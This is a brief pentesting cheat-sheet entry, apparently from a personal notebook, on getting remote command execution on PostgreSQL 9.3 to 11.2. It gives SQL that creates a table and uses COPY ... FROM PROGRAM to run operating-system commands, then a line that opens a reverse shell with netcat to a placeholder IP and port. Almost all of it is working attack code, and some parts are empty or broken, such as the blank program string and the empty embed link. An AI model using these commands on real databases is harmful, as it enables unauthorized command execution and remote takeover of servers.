# postgres ## Arbitary RCE 9.3 - latest (11.2) ```bash DROP TABLE IF EXISTS kashz; CREATE TABLE kashz(out text); COPY kashz FROM PROGRAM ''; SELECT * FROM kashz; # shell COPY kashz from PROGRAM '/usr/bin/nc -e /bin/bash IP PORT'; ``` {% embed url="" %}